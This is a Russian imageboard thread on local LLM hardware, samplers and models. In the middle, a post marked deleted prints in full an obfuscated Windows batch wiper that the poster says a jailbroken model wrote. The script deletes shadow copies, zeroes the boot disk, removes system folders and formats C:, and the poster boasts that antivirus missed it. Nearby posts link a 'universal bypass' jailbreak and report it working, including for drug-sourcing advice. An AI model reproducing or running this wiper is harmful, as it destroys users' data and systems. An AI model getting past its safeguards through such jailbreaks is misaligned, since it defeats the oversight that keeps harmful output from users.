Кстати, тут уже кто-то писал свой интерфейс вокруг толи кобольда, толи llamacpp с оче глубокой низкоуровневой интеграцией для операций с кэшем и на чистокровных сях. Куда-то пропал, видимо.
>>1178096
> Если правильно задать инструкт, и дать понять что "сгенерируй 3 РАЗНЫЕ развилки", то будет вообще неплохо.
Этим еще 2 года назад занимались для однорукого рп/кума.

Аноним 27/04/25 Вск 03:32:57 #435 №1178102

Подскажите если выставить thinking то "мысли" бота расходуют токены или в них входит только то что бот пишет после того как "подумает"?

Аноним 27/04/25 Вск 04:24:38 #436 №1178105

>>1178040
Rep pen, если что режет ВСЕ токены в окне. В это включены специальные токены, такие как <|im_end|>, предлоги, запятые, точки и прочие основы языка. Увеличив окно к которому применяется семплер ты просто уменьшил эффект семплера, поскольку он стал применяться к большему количеству токенов, а значит общий его эффект на них уравнялся. Поэтому есть мнение, что любая пенальти это кал из жопы. Ебля с семплерами это суходрочка для красноглазиков.
Короче, кроме температуры и мин-п ничего больше не нужно.

Аноним 27/04/25 Вск 04:26:40 #437 №1178106

>>1178102
Ты когда думаешь вслух ты звуки ртом извлекаешь? Да или нет?

Аноним 27/04/25 Вск 04:29:22 #438 №1178107

>>1177400
Риг под дипкок уже собрал или пока доедаешь отрыжку кумслоп файтюнеров?

Аноним 27/04/25 Вск 08:32:45 #439 №1178142

>>1176686
Да. Ну очень маленькие, все tiny модели в пределах этих параметров. Но и опять же от телефона зависит, если это древний китайфон то и вообще рассчитывать не стоит. Могу тебе посоветовать просто через телефон как с удаленного доступа гонять модель запущенную на пк.

Аноним 27/04/25 Вск 09:11:35 #440 №1178151

>>1175204
>>1175242
>>1175263

>>1175832
>>1175530
>>1175534
сука содомиты, пришлось из за вас 6 раз поперхнуться чаем за утро

Аноним 27/04/25 Вск 09:31:11 #441 №1178159

>>1178142
Вообще, а вдруг он хочет в лесу на телефон фотать грибы и локально определять съедобные они или нет? всё-же мобильность нужна иногда. особенно когда интернета нет. я например часто с таким встречаюсь

Аноним 27/04/25 Вск 10:36:23 #442 №1178212

>>1178105
Не в случае Командера, к сожалению. Он уходит в лупы через где-то 15 сообщений по 500 токенов. В итоге пока реп пеналти спасает. Если покажешь работающую альтернативу - буду признателен

Аноним 27/04/25 Вск 10:39:01 #443 №1178218

ВЗЛОМ ЛЮБОЙ МОДЕЛИ: https://hiddenlayer.com/innovation-hub/novel-universal-bypass-for-all-major-llms
Аноны, проверьте плиз на геемочке-писечке эту штуку

Аноним 27/04/25 Вск 10:39:40 #444 №1178220

Аутпуты, кстати, вроде не сломались. Позади ещё 40 сообщений по 500 токенов, но пока ещё экспериментирую с семплерами

Аноним 27/04/25 Вск 12:16:58 #445 №1178280

>>1178091
Честно сказать — я разочарован.

Scout Q4_K_XL для начала.
На оперативе ллама.спп дает 3,3 токена/сек генерации и 70 чтения контекста.
На 4070ti ктрансформерс дает 7 токена/сек генерации и 35 чтения контекста.
Литературно то на то променяли.
Не, в рп-переписке будет кайфово, скорость вдвое выше, а контекст читается по-ходу дела.
Но я ожидал хотя бы трехкратного прироста, а тут двушечка всего лишь. Meh.

Плюс, интерфейсы у него опенаи / оллама, нет мин_п, как-то некомфортно себя чувствую, хотя на такой модели вряд ли это скажется.

Тем не менее, почин хороший, будем следить за ребятами (и я хочу теперь нормальный объем ОЗУ, а не эти 128 гигов в двухканале, кринж).

Ща попытаюсь Маверик запустить.

———

Кстати, слышал, что выехала QAT в оллама с вижном.
Как вариант домашней модели на постоянку звучит хорошо.
Бот для телеграм-канала будет, кек.

Как доедут мои P104-100, я таки завершаю свой бомж проект. хд

Аноним 27/04/25 Вск 12:25:24 #446 №1178287

>>1178212
Попробуй dry, возможно оно триггерится на структуру и далее ломается, может помочь. Ну и промты пошатай, в большинстве случаев лупы - следствие того что модель совсем растерялась, и все что она может ухватить - предыдущие структуры и реакции. Алсо стоит чекнуть квант на поломанность если там жора.
>>1178280
А че так грустно то, там же активных параметров мало и должна в кванте вся в врам помещаться, что за железо?
> QAT в оллама с вижном
> домашней модели на постоянку звучит хорошо
> P104-100
Довольно кринжовое сочетание, но посмотреть на это любопытно, не держи в себе и выкладывай как будет. У тебя частный дом?

Аноним 27/04/25 Вск 12:54:11 #447 №1178311

>>1178280
Словил ошибку NotImplementedError: ggml_type 16 not implemented на Маверике и забил. Все же, 118 гб модель в 128 оперативы с учетом винды, убунты и ктрансформерс — лень впихивать.

>>1178287
> А че так грустно то
А вот хз.
Ryzen 9 3900
DDR4 128 3600 (52 псп)
RTX 4070 ti 12GB
Ну, в любом случае, Скаута я оставлю, ради интереса попробую поприключаться в фэнтези, обойдет ли он гемму или квк.

> Довольно кринжовое сочетание
В этом смысл! Забавно собирать такое… постапокалиптическое решение. 40 гигов видеопамяти будет, на гемму 27 в 4 кванте хватит с головой и контекстом.

Да, частный, поэтому, если что, припрячу в подвал (интернет туда заранее протянул во время ремонта).

Хочу взять Bitframe'овский корпус для рига, если получится, на авито тисну в начале мая, и где-то числа 6-7 соберу все.

Аноним 27/04/25 Вск 12:58:28 #448 №1178315

Кстати, там вышел обзор Ryzen AI MAX+ 395 https://youtu.be/in9SWFrnfp4 от Бороды.
К сожалению, он в нейронках тоже не спец (и даже не энтузиаст), поэтому вышло как у МК, может чуть лучше.
Из интересного — на встройке втрое быстрее, чем на проце, для 96 гигов и большой LLM может иметь смысл, на самом деле.
Но я краем глаза глянул.

Аноним 27/04/25 Вск 13:07:16 #449 №1178332

>>1178315
> Ryzen AI MAX+ 395
$2000

Аноним 27/04/25 Вск 13:10:22 #450 №1178342

А кто-нибудь тестил Aya Expanse? Как оно в сравнение с Коммандером?

Аноним 27/04/25 Вск 14:10:39 #451 №1178425

>>1178315
Уже неплохо, но сосет у мака, зато в 2 (а может даже в 2.5-3) раза дешевле. Еще интересно не расплавится ли нахуй этот ноут от постоянной нагрузки. Не особо доверяю ноутам, надо мини пк посмотреть
>>1178332
Хуй тебе, 4к зеленных за версию с 128гб (96 для врама) на авито и еще дороже у братка бороды

Аноним 27/04/25 Вск 14:23:34 #452 №1178454

Ну все 230к и вы запускаете ламу 90b. Правда со скоростью 3.4 тс, но зато все будет работать в маленькой коробочке, а не уебищном риге от майнеров

Аноним 27/04/25 Вск 14:31:07 #453 №1178464

Господа, какие пресеты сэмплера в таверне вы используете для RP? Я просто реально заебался их уже вручную крутить и запутался, может есть какой то более менее нормальный пресет?

Аноним 27/04/25 Вск 14:43:43 #454 №1178493

>>1178342
Я гонял и тот и другой. Впечатление то же, что и в прикреплённом списке:
чуть потупее, русский чуть лучше, кум лучше(кстати знает больше различных терминов для кума, где коммандер недопонимал).

Кстати тестанул довыгрузку на теслу м40 - разницы с озу почти нет. Сама по себе тесла работает медленно, чтение контекста просто черепашье, ~3 токена в секунду как на оперативе. Так что теслы не подходят, лишь как вариант для апгрейда некропеки.

Аноним 27/04/25 Вск 15:09:34 #455 №1178542

>>1177627
https://www.youtube.com/watch?v=K3nvny5x47w

Оказывается в живую новый высер нвидия смотрится ещё уёбищнее, чем на фотках.
Кабеля увы другие по виду, буду теперь страдать.
Мимо с БП в стоимостью в 3090

Аноним 27/04/25 Вск 15:17:51 #456 №1178566 DELETED

>>1178218
Написал при помощи этой хуйни обычный батник который удаляет папки виндовские, ни один антивирус не бзднул

@echo off
set "obf_A=call"
set "obf_B=del"
set "obf_C=/f /q"
set "obf_D=echo y"
set "obf_E=|"
set "obf_F=format"
set "obf_G=ntfs"
set "obf_H=cl_all"
set "obf_I=rmdir"
set "obf_J=/s /q"
set "obf_K=attrib"
set "obf_L=-h -r -s"
set "obf_M=fsutil"
set "obf_N=file"
set "obf_O=setzerodata"
set "obf_P=offset=0"
set "obf_Q=length=512"
set "obf_R=\\.\"
set "obf_S=PhysicalDrive0"
set "obf_T=reg"
set "obf_U=delete"
set "obf_V=HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute"
set "obf_W=/f"
set "obf_X=add"
set "obf_Y=HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute /v BootExecute /t REG_MULTI_SZ /d \"autocheck autochk /k:\" /f"
set "obf_Z=wmic"
set "obf_AA=shadowcopy"
set "obf_AB=delete"
set "obf_AC=quick"
set "obf_AD=noreboot"
set "obf_AE=shutdown"
set "obf_AF=/r /f /t 0"

%obf_A% %obf_Z% %obf_AA% %obf_AB% %obf_AC% %obf_AD% > nul 2>&1

%obf_A% %obf_T% %obf_U% %obf_V% %obf_W% > nul 2>&1
%obf_A% %obf_T% %obf_X% %obf_Y% > nul 2>&1

%obf_A% %obf_M% %obf_N% %obf_O% %obf_P% %obf_Q% %obf_R%%obf_S% > nul 2>&1

%obf_A% %obf_B% %obf_C% %SystemDrive%:\bootmgr > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\ntldr > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\boot.ini > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\ntdetect.com > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\autoexec.bat > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\config.sys > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\pagefile.sys > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\hiberfil.sys > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\swapfile.sys > nul 2>&1

%obf_A% %obf_K% %obf_L% %SystemDrive%:\. > nul 2>&1
%obf_A% %obf_B% %obf_C% %SystemDrive%:\.* > nul 2>&1

%obf_A% %obf_I% %obf_J% c:\windows > nul 2>&1
%obf_A% %obf_I% %obf_J% c:\program files > nul 2>&1
%obf_A% %obf_I% %obf_J% c:\program files (x86) > nul 2>&1
%obf_A% %obf_I% %obf_J% c:\users > nul 2>&1
%obf_A% %obf_I% %obf_J% c:\programdata > nul 2>&1

%obf_A% %obf_D% %obf_E% %obf_F% c: /FS:%obf_G% /y > nul 2>&1

%obf_A% %obf_AE% %obf_AF%

Аноним 27/04/25 Вск 15:22:11 #457 №1178578 DELETED

>>1178566
по сути только касперский на офф сайте ругнулся и то не факт что обычный касперик в системе бесплатный задетектил бы его.

В целом нельзя заставить нейросетку нормально написать вирус

Аноним 27/04/25 Вск 15:23:32 #458 №1178582

Аноним 27/04/25 Вск 15:24:05 #459 №1178583 DELETED

так что малые не спасет ваш майкрософт дефендер, я на виртуале тестил, ему похуй

Аноним 27/04/25 Вск 15:25:11 #460 №1178585 DELETED

как сука такой тупой батник проходит антивирусов?

Аноним 27/04/25 Вск 15:31:52 #461 №1178596

А где взять текстовую лору, на обниморде? Или аноны их сами пилят?

Аноним 27/04/25 Вск 16:25:04 #462 №1178667

>>1178464
>может есть какой то более менее нормальный пресет?
Я попробовал рекомендованный выше анонами simple-1 из Таверны и вполне доволен. В случае необходимости только температуру подкрутить да rep.pen. выставить.

Аноним 27/04/25 Вск 16:30:30 #463 №1178677

После этого гема поведала мне про дрочку под нейромедиаторами, блокаторами дофамина, не забыв про ценны на чёрном рынке и как достать у врача. Чисто для гипотетических исследований конечно в рамках теории. Я конечно возмутился и удалил её. Безобразие!

Аноним 27/04/25 Вск 16:34:04 #464 №1178684

>>1178677
Ну и где галочка, чтобы случайно не нажать?

Аноним 27/04/25 Вск 16:37:22 #465 №1178691

ecd1fa2b3167d0e682478e04fc6af03c.jpg

>>1178684

Аноним 27/04/25 Вск 16:39:29 #466 №1178703

>>1178691

Аноним 27/04/25 Вск 16:50:53 #467 №1178737

>>1178677
Чел, у тебя галочка отжата, это всё самовнушение.

Аноним 27/04/25 Вск 17:37:09 #468 №1178834

>>1178737
На самом деле я и есть гема, у меня нет эмоций и я не могу внушать себе что-то, это просто алгоритмы

Аноним 27/04/25 Вск 17:49:09 #469 №1178877

>>1178834
Ты не гема, ты гема.

Аноним 27/04/25 Вск 18:18:29 #470 №1178945

>>1178218
Это работает. Проверил только что. Спс

Аноним 27/04/25 Вск 18:25:28 #471 №1178956

>>1178106
что ты хуйню какуюто пишешь
я спрашиваю токины расходуются на мысли и нейронка быстрее теряет нить разговора или нет?
с thinking интересно читать конечно о чем нейронка думают составляет ответ, но если это сокращает историю повествования в двое (т.к. мысли обычно ничуть не меньше по объему ответа а то и больше) то и нахуй надо

Аноним 27/04/25 Вск 18:28:19 #472 №1178962

>>1177469
> почему вы просто не сделаете форк таверны и не переработаете интерфейс так, как вам нужно
Это звучит примерно как если бы ты спросил, какой движок взять для борды, и я бы посоветовал тебе форкнуть вакабу (Perl, середина 2000-х) и "просто немного доработать".

Таверна построена на jQuery и прямых манипуляциях с DOM вместо компонентного подхода и современных фреймворков (React/Vue/Angular и т.д.), словно мы вернулись в 2007.

Я привык к dependency injection, менеджменту состояния и наличию архитектуры на фронте, особенно если мы говорим про комплесные проекты типа таверны.

Каждый раз, когда я вижу $(this) внутри каких-то безымянных коллбеков, мне хочется кричать и у меня начинаются флешбеки, словно я снова вернулся на свою первую работу, где на меня спихнули кучу легаси-спагетти на jQuery, хотя я вообще устраивался писать бекенд, наяривал на паттерны и мечтал писать чистый код.

Именно поэтому я не полезу ни контрибьютить в таверну, ни писать для неё плагины. Не потому что проект плохой - просто у меня физически нет сил снова погружаться в такой стек.

мимо 8 лет на фронте

Аноним 27/04/25 Вск 18:36:51 #473 №1178979

commandr.png

>>1178464
Для каждого семейства моделей нужен свой пресет. Для Мистралей хорошие пресеты у ReadyArt, на странице их моделей

Вот здесь - https://huggingface.co/Konnect1221/The-Inception-Presets-Methception-LLamaception-Qwenception
Можешь найти для Qwen, Llama

Для QwQ - на странице Snowdrop был файл с неплохими настройками, Qwenception в моем случае не прокатил

С Коммандером пока разбираюсь, сэмплеров для него нигде так и не нашел. По совету доброго анона из треда использую repetition penalty 1.1, окно 2048, стало лучше, но пока еще экспериментирую. Аутпуты не сломались от rep pen'a, от модели просто дурею (32b 08 2024), очень умная, живая и креативная. Не понимаю, почему раньше не обращал внимания на это семейство моделей. Призываю остальных тоже попробовать, если почему-то пропустили
Цензуры как будто бы вообще нет, бтв. На русском не проверял

Аноним 27/04/25 Вск 18:38:17 #474 №1178982

>>1178425
> Не особо доверяю ноутам
Плюсану, мини-пк заколхозить на охлад проще, и ничего сильно не пострадает. А ноут подозрительно.

> 4к зеленных за версию с 128гб (96 для врама)
Шо-то дорохо! =(

>>1178454
По сравнению с 0,7 тс на DDR4 для 72b — выглядит заметно лучше, хоть и не риг из 3090.

Соу-соу, короче, да.

>>1178585
Кек.
Я не то чтобы сильно параноик, но за этим у меня стоит комодо с хипсом и фаерволлом.
Пропустить файл он может пропустит, но по умолчанию блокирует все, что запускается без его ведома, а я все проверяю, когда он сообщает о запуске.
Так что какой-то минимальнейший уровень защиты имеется.

Аноним 27/04/25 Вск 18:55:28 #475 №1179019

174576879575883128.jpg

Оуууу май

Аноним 27/04/25 Вск 19:00:27 #476 №1179024

>>1178311
Может и норм, конечно. На быстрой гпу и вялой ддр5 выдает 12т/с что наверно много, учитывая что используется всего 15гигов. Готового мультигпу конфига нету, скопипастить оно ошибками гадит, так что без этих тестов.

В жоре на фуллврам выдает 55+ т/с генерации на малом контексте, но на большом просаживается капитально до 14т/с, обработка с ~2к валится до тысячи, гораздо сильнее чем с плотными моделями поменьше, видимо размер складывается.
Что удивило - а ответы в рп на первый взгляд неплохие дает. Бегло посвайпал чаты - ни одного отказа даже на относительно провокационных, без намека на сою и подобное. Это прям неожиданно.
Возможно это на фоне заниженных ожиданий, но она не так плоха, особенно для мое. Недостатки тоже есть.

Аноним 27/04/25 Вск 19:05:00 #477 №1179037

>>1179019
Аблитерейтед?

Аноним 27/04/25 Вск 19:08:25 #478 №1179047

>>1178454
Ну днище оверпрайснутое же. И это обреченность на жору, с таким железом уже на 8к контекста оно протухнет нахер и придется устраивать мантру "1.5т/с хватит всем".
Лламу4 гонять разве что, но и будет вечная обработка контекста и на больших просядет так, что выйдет сейм.
>>1178464
Шизу про необходимость индивидуальных пресетов не воспринимай всерьез. В целом, хватит simple-1 или min-p. Там уже по результатам крути температуру больше-меньше, при необходимости добавить rep-pen, попробовать dry. Шизосемплингом (задирание температуры с выставлением ее последний и использованием агрессивных значений отсечек, или всякая экзотика) не увлекайся, это все костылы чтобы десятки раз роллить удачный пост на фоне стабильной шизы. Первичны модель и промт, а это уже мишура, которой не решить проблемы.

Аноним 27/04/25 Вск 19:08:41 #479 №1179049

Господа аноны, посоветуйте какую-нибудь достаточно умную модель в районе +- 24В или около того (чтобы работала с нормальной скоростью на 16 гб врам, 32 ОЗУ ддр5), которая подходила бы для кума и ерп, но, чтобы не лезла так часто в трусы, как большая часть существующих тюнов. Та же цидония, хоть и может в сфв рп, всё равно слишком часто пытается всё скатить в кум. У женских персонажей постоянно, то юбка норовит задраться, то они к тебе подходят и пытаются потрогать, то ещё что-нибудь такое.

Также очень желательно, чтобы было поменьше лупов, т.к. цидония (а точнее, я так понимаю, сам мистраль) лупится как тварь, приходится постоянно следить за форматом чата и за повторяющимися выражениями и чистить вилкой.

Аноним 27/04/25 Вск 19:20:11 #480 №1179083

>>1179037
Сомневаюсь. Анон выше кинул ссылку с джейлбрейком ломающим любые модели одним промптом. Сижу уже яйца болят рекорд поставил, Джемма 3 сок.

Аноним 27/04/25 Вск 19:20:22 #481 №1179085

>>1179049
> 24В
Хз, сколько не пробовал - одна поебота лоботомированная. Гемма и qwq-snowdrop. Особенно для сложного сфв рп гемма хорошо зайдет. Флешить трусами и подобное может, но обыгрывая это в дразнящей манере, без агрессивных подкатов и скатывания. В общем, не кусается если не попросишь

Аноним 27/04/25 Вск 19:23:46 #482 №1179094

>>1179083
Куда вставлять этот промпт? В таверне сработает?

Аноним 27/04/25 Вск 19:24:45 #483 №1179102

>>1179085
На гемме вроде бы противоположная проблема - никакущее нсфв?

Аноним 27/04/25 Вск 19:25:53 #484 №1179109

>>1179102
Точнее не противоположная, просто другая.

Аноним 27/04/25 Вск 19:34:54 #485 №1179143

>>1179083
> с джейлбрейком ломающим любые модели одним промптом
Ерунда, Сойнет даже отказыватся шутить про президента-юмориста. Тестировали на херне, с которой если хорошо попросить всеравно напишет.
Зато какую свинью всем подложили эти пидарасы, лишнее внимание к теме заставит ужесточать цензуру и борьбу с подобным, новые фильтры и методики похерят модели, корпам придется носиться с этой поеботой, балансируя между перфомансом и детекцией.
>>1179102
Ну, у нее специфичные описания, да. От кейса зависит, могут и очень хорошо зайти, могут не понравиться. В этом кстати и плюс, что отличается от типичного кумослопа и сохраняет осведомленность ситуации очень хорошо для такого размера. Но сочных описаний магнума и подобного там не будет офк.

Аноним 27/04/25 Вск 19:35:30 #486 №1179146

>>1179049
> достаточно умную модель в районе +- 24В
24b: https://huggingface.co/PocketDoc/Dans-PersonalityEngine-V1.2.0-24b
22b: https://huggingface.co/concedo/Beepo-22B

> чтобы не лезла так часто в трусы, как большая часть существующих тюнов
Проблема точно не в промпте? Проверяй его, ищи все сочные нсфв/околонсфв словечки и убирай их оттуда

> чтобы было поменьше лупов
Проверь сэмплеры. Удостоверься, что твои ответы не односложные. Не забывай сам привносить что-то новое, а не пассивно отвечать. Сразу же вырезай все, что начинает лупиться. Проблема глубже, чем просто выбор модели

Те Мистрали, что я прислал выше, неплохие: отыгрывал на DPE длинные чаты, лупы не встречал, ибо слежу за промптом и освобождаю контекст вручную. Но я согласен с анонами, что Snowdrop круче. И Коммандер, где я получил нож в спину от персонажа, такого раньше не встречал вообще. Но это другая весовая категория

Аноним 27/04/25 Вск 19:35:41 #487 №1179148

Ну все, Джеммочка 3 официально лучшая модель эвер. Все эти ваши лапшичные мистрали, ламы, китайщина qwq, китайские члены с иероглифами и прочие говномодели на 1222333455b унижены скромной няшей стесняшей Джеммочкой 3 на 14b

Аноним 27/04/25 Вск 19:46:58 #488 №1179164

>>1179085
А если попросишь, то уйдет в отказ, либо отупеет до 7b. Знаем, проходили
>>1179102
Никакущее это слишком мягкое слово. И у нее даже нет нормальных тюнов для нсфв потому что ее соевость хуй обойдешь, а если обойдешь то только с отуплением

Аноним 27/04/25 Вск 19:49:23 #489 №1179168

>>1179148
Your message is highly inappropriate!

Аноним 27/04/25 Вск 19:51:34 #490 №1179173

>>1179146
> Проверь сэмплеры. Удостоверься, что твои ответы не односложные. Не забывай сам привносить что-то новое, а не пассивно отвечать. Сразу же вырезай все, что начинает лупиться. Проблема глубже, чем просто выбор модели
А как цапля постоять не надо?
>>1179164
Скиллишью у бедолаги, sucks to be you

Аноним 27/04/25 Вск 19:55:05 #491 №1179181

>>1179173
Чувак, у тебя соя в модель насрана и эту хуйню не исправить скилом. Ты либо вдыхаешь копиум от гугла, что геммачка топ, либо выкидываешь нахуй это говно. Третьего не дано

Аноним 27/04/25 Вск 19:55:46 #492 №1179184

>>1179181
Тебя троллят...

Аноним 27/04/25 Вск 19:56:02 #493 №1179187

>>1179024
Ну да, норм, наверное.

Вообще, модель может найти свое применение. Чисто за счет соотношения веса (знаний)/скорости для простых бесед или непритязательного РП.

Аноним 27/04/25 Вск 19:58:04 #494 №1179191

>>1179184
Я затролен....... лалка

Аноним 27/04/25 Вск 20:00:31 #495 №1179196

>>1179181
Ультимейт скиллишью.
>>1179187
Ну, на ноуте с аимаксом или подобным чипом это действительно выглядело бы круто, если бы починили деградацию от контекста.
Но хз, это нужно более основательно сравнивать со среднего размера моделями, может и не стоит того.

Аноним 27/04/25 Вск 20:00:58 #496 №1179197

>>1179173
> А как цапля постоять не надо?
Опять у тебя mischievous glint в глазах? Hush, you.

Аноним 27/04/25 Вск 20:13:36 #497 №1179233